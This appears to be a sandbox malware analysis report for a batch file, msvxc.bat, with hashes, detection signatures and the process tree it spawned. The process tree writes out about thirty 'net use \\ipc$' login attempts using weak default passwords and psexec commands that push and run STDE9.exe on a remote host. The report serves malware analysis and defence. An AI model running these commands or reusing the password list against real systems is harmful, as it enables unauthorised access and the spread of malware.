91639c206da158a13527e6436fc3bc149bb1ce531e0add94f0a256eae6918ea7

Analysis

max time kernel
149s
max time network
174s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
11/05/2023, 15:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

msvxc.bat
Size

1KB
MD5

c6359a6b2cf7858087f482a17b624238
SHA1

bbe518ba66ed1454c617c01506d8a27b7b3d507a
SHA256

df2631e89eedd06b94f9309598a23f4b833645c1ed1617c0ab97ff0ff9423f86
SHA512

1de3e018054dff10012e948b4a707fdd20dbabe63cb10d0a97ae6fbba6856316c90d53cef4e70c62fc28371021407d46ee2aa136b1e0933f131a7f2fd489f9e6

Score

7^/10

upx

Malware Config

Signatures

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral4/memory/4396-133-0x0000000000400000-0x0000000000437000-memory.dmp	upx
behavioral4/memory/4396-134-0x0000000000400000-0x0000000000437000-memory.dmp	upx
behavioral4/memory/2524-135-0x0000000000400000-0x0000000000437000-memory.dmp	upx
behavioral4/memory/4296-136-0x0000000000400000-0x0000000000437000-memory.dmp	upx

Runs net.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1920 wrote to memory of 5080	1920	cmd.exe	84
PID 1920 wrote to memory of 5080	1920	cmd.exe	84
PID 1920 wrote to memory of 2120	1920	cmd.exe	85
PID 1920 wrote to memory of 2120	1920	cmd.exe	85
PID 1920 wrote to memory of 4276	1920	cmd.exe	86
PID 1920 wrote to memory of 4276	1920	cmd.exe	86
PID 1920 wrote to memory of 2180	1920	cmd.exe	87
PID 1920 wrote to memory of 2180	1920	cmd.exe	87
PID 1920 wrote to memory of 3640	1920	cmd.exe	88
PID 1920 wrote to memory of 3640	1920	cmd.exe	88
PID 1920 wrote to memory of 324	1920	cmd.exe	89
PID 1920 wrote to memory of 324	1920	cmd.exe	89
PID 1920 wrote to memory of 2676	1920	cmd.exe	90
PID 1920 wrote to memory of 2676	1920	cmd.exe	90
PID 1920 wrote to memory of 216	1920	cmd.exe	91
PID 1920 wrote to memory of 216	1920	cmd.exe	91
PID 1920 wrote to memory of 1596	1920	cmd.exe	92
PID 1920 wrote to memory of 1596	1920	cmd.exe	92
PID 1920 wrote to memory of 3844	1920	cmd.exe	93
PID 1920 wrote to memory of 3844	1920	cmd.exe	93
PID 1920 wrote to memory of 4708	1920	cmd.exe	94
PID 1920 wrote to memory of 4708	1920	cmd.exe	94
PID 1920 wrote to memory of 404	1920	cmd.exe	95
PID 1920 wrote to memory of 404	1920	cmd.exe	95
PID 1920 wrote to memory of 1392	1920	cmd.exe	96
PID 1920 wrote to memory of 1392	1920	cmd.exe	96
PID 1920 wrote to memory of 4584	1920	cmd.exe	97
PID 1920 wrote to memory of 4584	1920	cmd.exe	97
PID 1920 wrote to memory of 2148	1920	cmd.exe	98
PID 1920 wrote to memory of 2148	1920	cmd.exe	98
PID 1920 wrote to memory of 4552	1920	cmd.exe	99
PID 1920 wrote to memory of 4552	1920	cmd.exe	99
PID 1920 wrote to memory of 1872	1920	cmd.exe	100
PID 1920 wrote to memory of 1872	1920	cmd.exe	100
PID 1920 wrote to memory of 3984	1920	cmd.exe	101
PID 1920 wrote to memory of 3984	1920	cmd.exe	101
PID 1920 wrote to memory of 4304	1920	cmd.exe	102
PID 1920 wrote to memory of 4304	1920	cmd.exe	102
PID 1920 wrote to memory of 4952	1920	cmd.exe	103
PID 1920 wrote to memory of 4952	1920	cmd.exe	103
PID 1920 wrote to memory of 1004	1920	cmd.exe	104
PID 1920 wrote to memory of 1004	1920	cmd.exe	104
PID 1920 wrote to memory of 4664	1920	cmd.exe	105
PID 1920 wrote to memory of 4664	1920	cmd.exe	105
PID 1920 wrote to memory of 4940	1920	cmd.exe	106
PID 1920 wrote to memory of 4940	1920	cmd.exe	106
PID 1920 wrote to memory of 1472	1920	cmd.exe	107
PID 1920 wrote to memory of 1472	1920	cmd.exe	107
PID 1920 wrote to memory of 1752	1920	cmd.exe	108
PID 1920 wrote to memory of 1752	1920	cmd.exe	108
PID 1920 wrote to memory of 3168	1920	cmd.exe	109
PID 1920 wrote to memory of 3168	1920	cmd.exe	109
PID 1920 wrote to memory of 664	1920	cmd.exe	110
PID 1920 wrote to memory of 664	1920	cmd.exe	110
PID 1920 wrote to memory of 4732	1920	cmd.exe	111
PID 1920 wrote to memory of 4732	1920	cmd.exe	111
PID 1920 wrote to memory of 3264	1920	cmd.exe	112
PID 1920 wrote to memory of 3264	1920	cmd.exe	112
PID 1920 wrote to memory of 4396	1920	cmd.exe	113
PID 1920 wrote to memory of 4396	1920	cmd.exe	113
PID 1920 wrote to memory of 4396	1920	cmd.exe	113
PID 1920 wrote to memory of 2524	1920	cmd.exe	116
PID 1920 wrote to memory of 2524	1920	cmd.exe	116
PID 1920 wrote to memory of 2524	1920	cmd.exe	116

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\msvxc.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1920
- C:\Windows\system32\net.exe
  net use \\\ipc$ "" /user:Administrator
  2⤵
  PID:5080
- C:\Windows\system32\net.exe
  net use \\\ipc$ "" /user:administrator
  2⤵
  PID:2120
- C:\Windows\system32\net.exe
  net use \\\ipc$ "" /user:admin
  2⤵
  PID:4276
- C:\Windows\system32\net.exe
  net use \\\ipc$ "" /user:Admin
  2⤵
  PID:2180
- C:\Windows\system32\net.exe
  net use \\\ipc$ "" /user:guest
  2⤵
  PID:3640
- C:\Windows\system32\net.exe
  net use \\\ipc$ "" /user:Guest
  2⤵
  PID:324
- C:\Windows\system32\net.exe
  net use \\\ipc$ "" /user:temp
  2⤵
  PID:2676
- C:\Windows\system32\net.exe
  net use \\\ipc$ "" /user:Temp
  2⤵
  PID:216
- C:\Windows\system32\net.exe
  net use \\\ipc$ "" /user:root
  2⤵
  PID:1596
- C:\Windows\system32\net.exe
  net use \\\ipc$ "" /user:ROOT
  2⤵
  PID:3844
- C:\Windows\system32\net.exe
  net use \\\ipc$ "12345" /user:Administrator
  2⤵
  PID:4708
- C:\Windows\system32\net.exe
  net use \\\ipc$ "zzzzz" /user:Administrator
  2⤵
  PID:404
- C:\Windows\system32\net.exe
  net use \\\ipc$ "xxxxx" /user:Administrator
  2⤵
  PID:1392
- C:\Windows\system32\net.exe
  net use \\\ipc$ "Admin" /user:Administrator
  2⤵
  PID:4584
- C:\Windows\system32\net.exe
  net use \\\ipc$ "guest" /user:guest
  2⤵
  PID:2148
- C:\Windows\system32\net.exe
  net use \\\ipc$ "2002" /user:Administrator
  2⤵
  PID:4552
- C:\Windows\system32\net.exe
  net use \\\ipc$ "abc123" /user:Administrator
  2⤵
  PID:1872
- C:\Windows\system32\net.exe
  net use \\\ipc$ "temp" /user:Administrator
  2⤵
  PID:3984
- C:\Windows\system32\net.exe
  net use \\\ipc$ "Administrator" /user:Administrator
  2⤵
  PID:4304
- C:\Windows\system32\net.exe
  net use \\\ipc$ "login" /user:Administrator
  2⤵
  PID:4952
- C:\Windows\system32\net.exe
  net use \\\ipc$ "root" /user:root
  2⤵
  PID:1004
- C:\Windows\system32\net.exe
  net use \\\ipc$ "temp" /user:Temp
  2⤵
  PID:4664
- C:\Windows\system32\net.exe
  net use \\\ipc$ "root" /user:Administrator
  2⤵
  PID:4940
- C:\Windows\system32\net.exe
  net use \\\ipc$ "adm" /user:Administrator
  2⤵
  PID:1472
- C:\Windows\system32\net.exe
  net use \\\ipc$ "2003" /user:Administrator
  2⤵
  PID:1752
- C:\Windows\system32\net.exe
  net use \\\ipc$ "default" /user:Administrator
  2⤵
  PID:3168
- C:\Windows\system32\net.exe
  net use \\\ipc$ "student" /user:student
  2⤵
  PID:664
- C:\Windows\system32\net.exe
  net use \\\ipc$ "admin" /user:Admin
  2⤵
  PID:4732
- C:\Windows\system32\net.exe
  net use \\\ipc$ "admin" /user:admin
  2⤵
  PID:3264
- C:\Users\Admin\AppData\Local\Temp\psexec.exe
  psexec \\ attrib.exe -r STDE9.exe
  2⤵
  PID:4396
- C:\Users\Admin\AppData\Local\Temp\psexec.exe
  psexec \\ -f -c -d STDE9.exe -o
  2⤵
  PID:2524
- C:\Users\Admin\AppData\Local\Temp\psexec.exe
  psexec \\ -d STDE9.exe -o
  2⤵
  PID:4296

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2524-135-0x0000000000400000-0x0000000000437000-memory.dmp

Filesize
220KB

Download
memory/4296-136-0x0000000000400000-0x0000000000437000-memory.dmp

Filesize
220KB

Download
memory/4396-133-0x0000000000400000-0x0000000000437000-memory.dmp

Filesize
220KB

Download
memory/4396-134-0x0000000000400000-0x0000000000437000-memory.dmp

Filesize
220KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads